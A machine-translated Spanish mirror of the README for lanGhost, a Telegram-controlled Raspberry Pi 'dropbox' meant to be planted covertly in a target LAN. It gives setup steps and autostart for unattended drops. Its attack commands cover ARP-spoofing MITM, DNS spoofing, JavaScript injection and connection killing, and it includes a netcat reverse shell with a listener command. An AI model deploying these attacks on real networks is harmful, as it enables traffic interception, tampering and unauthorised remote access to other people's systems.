Inicio>Relacionado con la programación>Código Fuente de IA
Descargar
langghost

¡Advertencia! Este proyecto ya no se mantiene y puede no funcionar como excepto.

Un chatbot de lan dropbox controlable a través de telegrama

características:






instalación:

advertencia:

Langhost está diseñado para Raspberry PIS ( Raspbian / Kali para RPI ). Ejecutarlo en otras distribuciones de escritorio podría causar problemas y no puede funcionar como excepto.

Necesitará una Raspberry Pi con Raspbian/Kali fresco en la tarjeta SD, porque no desea nada más que se ejecute en segundo plano.

Arrene el PI, obtenga una venta SSH o conecte un monitor y un teclado e ingrese estos comandos: 

 $ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py

¡ Lea las preguntas/mensajes mientras ejecuta el script de configuración!

Paso 1/4 - setup.py 

 [+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.

Paso 2/4 - setup.py 

 [+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.

After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.

Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.

After you send your username of choise to @BotFather, you will recieve
your API key.



Paso 3/4 - setup.py 

 [+] Now for lanGhost to only allow access to you, you need to verify yourself.

Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.

[+] Verification code to send: ******

Paso 4/4 - setup.py 

 [+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)

¡Si está listo con la configuración, simplemente reinicie el PI y Langhost comenzarán de inmediato!

uso:

Advertencias:

No se recomienda usar Langhost en una red más grande que /24 porque los escaneos tardarán demasiado.

Langhost no está callado . ¡Cualquiera que monitoree el tráfico puede ver los paquetes ARP!

Déjelo en una red:

Si ha seleccionado yes en step 4/4 (autostart) el PI está completamente configurado para soltar. Langhost debe comenzar en el arranque y enviarle un mensaje en Telegram con el texto: lanGhost started! ? .

¡Asegúrese de probarlo en su laboratorio primero y pruebe si Langhost responde a sus mensajes!

Si está todo configurado, simplemente conéctelo a la red de destino conectando el cable Ethernet al PI y conectando la alimentación a través de Micro USB y ¡está listo para comenzar!

(Langhost también puede funcionar a través de WiFi, pero deberá configurar wpa_supplicant para conectarse a la red automáticamente primero)

Comandos disponibles: 

 /scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.

Sistema de ataque:

Puede iniciar un ataque usando uno de estos comandos: /kill, /mitm, /replaceimg, /injectjs, /spoofdns

Ater tienes uno o más ataques ejecutándose, puedes usar el comando /attack para obtener una lista de ellos que contiene el ATTACK-ID .

Para detener un tipo de ataque /stop [ATTACK-ID] .

Shell inverso:

advertencia:

/reversesh solo hace una conexión TCP NetCat que no está encriptada y todo el tráfico se puede monitorear. Úselo solo para soluciones de emergencia o para configurar una conexión inversa cifrada si es necesario.

El comando /reversesh es para obtener un shell inverso en el Pi, cuando no se puede acceder desde el exterior.

Para usar el comando /reversesh deberá tener un servidor escuchando el shell.

Comando netcat para iniciar el oyente en su servidor: 

 $ nc -l 0.0.0.0 [PORT]

Comando de telegrama: 

 /reversesh [IP-of-your-listening-server] [PORT]

ataques:

  • /kill : detiene la conectividad a Internet para el objetivo.
  • /mitm : captura el tráfico HTTP y DNS desde el objetivo y lo envía en mensajes de texto.
  • /replaceimg : reemplaza las imágenes HTTP para el objetivo a qué imagen envía al bot.
  • /injectjs : inyecta JavaScript en cada respuesta HTTP HTML para el objetivo. Debe alojar el archivo JS en su servidor y dar la URL como parámetro.
  • /spoofdns : respuestas DNS de las parodias para el objetivo.

¡Todos los ataques usan la falsificación de ARP !

escaneos:

  • /scan : escanea la red local y devuelve los hosts en línea. Utiliza el escaneo nmap -sn para descubrir hosts.
  • /scanip - Escanea una dirección IP para puertos abiertos y otra información. Utiliza el escaneo nmap -sS .

Notificaciones:

Recibirá un mensaje cada vez que un nuevo dispositivo conecta/sale de la red.

descargo de responsabilidad:

No soy responsable de nada de lo que haga con este programa, así que solo úselo para fines buenos y educativos.

legal:

Copyright (c) 2018 por David Schütz. Algunos derechos reservados.

Langhost está bajo los términos de la licencia MIT, siguiendo todas las aclaraciones establecidas en el archivo de licencia. También puede seguir adelante y enviarme un correo electrónico a XDAVID {AT} ProtonMail {dot} com.

Expandir
Información adicional
Recomendado para ti
Información relacionada Todo